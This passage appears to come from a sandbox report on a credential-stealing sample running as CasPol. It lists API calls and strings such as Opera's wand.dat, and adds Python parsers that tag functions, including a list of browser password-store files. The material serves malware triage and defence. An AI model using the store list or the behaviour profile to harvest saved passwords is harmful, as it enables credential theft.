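OFFSET_RE = re.compile(r"Offset: ([0-9A-F]+)")

@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple            # raw argument tokens as listed ('?' = unresolved)
    ref: int               # virtual address of the call site in the dump
    via: Optional[int]     # address of the callee when the call is indirect ("Part of subcall")

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # (text, xref address)
    meta: dict = field(default_factory=dict)      # API ID, Opcode ID, Source File, ...

    @property
    def image_base(self) -> Optional[int]:
        m = OFFSET_RE.search(self.meta.get("Source File", ""))
        return int(m.group(1), 16) if m else None

def parse_records(text: str) -> list:
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):              # section header; "APIs" opens a record
            if line == "APIs":
                if cur is not None:
                    records.append(cur)
                cur = FunctionRecord()
            section = line
            continue
        body = line[1:].strip()
        if cur is None:                           # record tail cut off at a page boundary
            cur = FunctionRecord()
        if section == "APIs":
            m = API_RE.match(body)
            if not m:
                raise ValueError(f"unparsed API line: {body!r}")
            via, name, module, args, ref = m.groups()
            cur.apis.append(ApiCall(name, module, tuple(args.split(",")) if args else (),
                                    int(ref, 16), int(via, 16) if via else None))
        elif section == "Strings":
            m = STR_RE.match(body)
            if not m:
                raise ValueError(f"unparsed string line: {body!r}")
            cur.strings.append((m.group(1), int(m.group(2), 16)))
        else:
            m = KV_RE.match(body)
            if m:
                cur.meta[m.group(1).strip()] = m.group(2).strip()
    if cur is not None:
        records.append(cur)
    return records

def records_calling(records, api: str, direct_only: bool = True) -> list:
    """Records that call `api`; by default ignore calls reached only through a callee."""
    return [r for r in records
            if any(c.name == api and (c.via is None or not direct_only) for c in r.apis)]

def records_with_string(records, needle: str) -> list:
    return [r for r in records if any(needle in s for s, _ in r.strings)]

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in records_calling(recs, "WideCharToMultiByte"):
        base = r.image_base
        print(r.meta.get("Opcode ID"), [hex(c.ref - base) for c in r.apis])
```

The direct/indirect distinction matters when pivoting: "Part of subcall function" lines are inherited from callees, so matching on them alone will group every caller of a shared helper (here the `??3@YAXPAX@Z` destructor chain) into one cluster.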
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                  • String ID: MS Sans Serif
                                                                                                                  • API String ID: 210187428-168460110
                                                                                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                                                  • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                                                  • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                                                  • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3384217055-0
                                                                                                                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040560C
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                  • String ID: *.*$dat$wand.dat
                                                                                                                  • API String ID: 2618321458-1828844352
                                                                                                                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00412057
                                                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3550944819-0
                                                                                                                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                  APIs
                                                                                                                  • free.MSVCRT ref: 0040F561
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$free
                                                                                                                  • String ID: g4@
                                                                                                                  • API String ID: 2888793982-2133833424
                                                                                                                  • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                  • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                  • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                  • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004144E7
                                                                                                                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                    • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                  • memset.MSVCRT ref: 0041451A
                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1127616056-0
                                                                                                                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                  APIs
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                  • malloc.MSVCRT ref: 00417459
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                                  • free.MSVCRT ref: 0041747F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2605342592-0
                                                                                                                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                  • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2678498856-0
                                                                                                                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040F673
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                  • strlen.MSVCRT ref: 0040F6A2
                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2754987064-0
                                                                                                                  • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                  • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                  • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                  • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040F6E2
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                  • strlen.MSVCRT ref: 0040F70D
                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2754987064-0
                                                                                                                  • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                  • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                  • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                  • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
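The records above are the sandbox's automated output: they list which APIs each dumped function calls, but leave the arguments as raw hex and say nothing about what the sequences amount to. The parser below is an added example, not Joe Sandbox code and not part of this report. It reads records in the layout shown on this page (the "APIs" list with its indented "Part of subcall function" lines, then the "Memory Dump Source" and "Similarity" key/value fields), decodes two argument values the listing leaves opaque (WideCharToMultiByte's code page 0xFDE9, which is 65001 = CP_UTF8, and CreateWindowExW's dwStyle 0x00CF0000, which is WS_OVERLAPPEDWINDOW), and tags each function with a capability heuristic. The record grammar is inferred from this page; the tag names and the browser login-store file list are this editor's assumptions (only wand.dat appears in the listing); the three sample records are copied from the listing with hashes the parser does not use omitted.

```python
"""Parse Joe Sandbox 'Executed Functions' records (API lines plus the 'Memory Dump
Source' and 'Similarity' fields) and tag each function by what its API sequence
suggests. Added example, not Joe Sandbox code: grammar inferred from this page's
listing; tag rules and constant names are this editor's triage heuristics."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set
# Constructed input: three records copied from the listing above in the page's own
# layout (bullets, indented 'Part of subcall function' lines); unused hashes omitted.
SAMPLE = """\
APIs
• memset.MSVCRT ref: 0040F673
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
• strlen.MSVCRT ref: 0040F6A2
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID:
• API String ID: 2754987064-0
APIs
• memset.MSVCRT ref: 0040560C
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
Similarity
• String ID: *.*$dat$wand.dat
• API String ID: 2618321458-1828844352
APIs
• RegisterClassW.USER32(?), ref: 00412428
• CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
Similarity
• String ID:
• API String ID: 2678498856-0
"""
API_RE = re.compile(r"^(?:Part of subcall function (?P<parent>[0-9A-F]+): )?(?P<name>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list                         # int for resolved 8-digit hex, raw text ('?', '<item>') otherwise
    ref: str
    subcall_of: Optional[str] = None   # parent function when the call happens inside a callee

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

def parse_arg(tok: str):
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"-?[0-9A-F]{8}", tok) else tok

def parse_records(text: str) -> List[FunctionRecord]:
    records, current, section = [], None, ""
    for line in (l.strip() for l in text.splitlines() if l.strip()):
        if line == "APIs":                     # every record opens with its API list
            current = FunctionRecord()
            records.append(current)
            section = line
        elif current is None:
            continue
        elif not line.startswith("•"):         # Strings / Memory Dump Source / Similarity ...
            section = line
        elif section == "APIs":
            m = API_RE.match(line[1:].strip())
            if m:
                args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
                current.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["parent"]))
        else:                                  # '• Key: value' lines of the other sections
            key, _, value = line[1:].partition(":")
            current.fields[key.strip()] = value.strip()
    return records

# Win32 values worth reading off the listing: WideCharToMultiByte CodePage 0xFDE9 is
# 65001 = CP_UTF8; CreateWindowExW dwStyle 0x00CF0000 is WS_OVERLAPPEDWINDOW.
KNOWN_CONSTANTS = {("WideCharToMultiByte", 0): {0x0: "CP_ACP", 0xFDE9: "CP_UTF8"},
                   ("CreateWindowExW", 3): {0x00CF0000: "WS_OVERLAPPEDWINDOW"}}
# Browser saved-login store file names (editor's list); wand.dat (Opera) is the one this listing shows.
BROWSER_STORE_FILES = {"wand.dat", "Login Data", "logins.json", "signons.sqlite", "key4.db"}

def annotate(call: ApiCall) -> List[str]:
    return [f"{call.name} arg{i}={KNOWN_CONSTANTS[(call.name, i)][a]}" for i, a in enumerate(call.args)
            if isinstance(a, int) and a in KNOWN_CONSTANTS.get((call.name, i), {})]

def tag_record(rec: FunctionRecord) -> Set[str]:
    direct = {c.name for c in rec.calls if c.subcall_of is None}
    strings = set(rec.fields.get("String ID", "").split("$"))
    tags = set()
    if {"WideCharToMultiByte", "WriteFile"} <= direct:
        tags.add("converts-text-and-writes-file")
    if strings & BROWSER_STORE_FILES:
        tags.add("browser-login-store-lookup")
    if {"RegisterClassW", "CreateWindowExW"} <= direct:
        tags.add("creates-window")
    return tags

def triage(text: str) -> List[dict]:
    return [{"api_string_id": r.fields.get("API String ID", ""), "tags": sorted(tag_record(r)),
             "constants": [a for c in r.calls for a in annotate(c)]} for r in parse_records(text)]
```

Run over the full listing, the tags give a quick map of which dumped functions look at browser login stores, write converted text to a file, or build a window; the "API String ID" value is carried through so each tagged function can be matched back to its Similarity block in the report. The tags are triage aids, not verdicts, and should be confirmed against the disassembly.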
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                    • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                    • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                  • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 764393265-0
                                                                                                                  • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                  • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                  • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                  • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                  APIs
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$System$File$LocalSpecific
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 979780441-0
                                                                                                                  • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                  • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                  • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                  • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                  • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                  • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1386444988-0
                                                                                                                  • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                  • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                  • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                  • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                  APIs
                                                                                                                  • wcschr.MSVCRT ref: 0040F79E
                                                                                                                  • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                    • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                    • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wcschr$memcpywcslen
                                                                                                                  • String ID: "
                                                                                                                  • API String ID: 1983396471-123907689
                                                                                                                  • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                  • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                  • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                  • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                  APIs
                                                                                                                  • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                                  • String ID: %2.2X
                                                                                                                  • API String ID: 2789212964-323797159
                                                                                                                  • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                  • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                  • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                  • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040E770
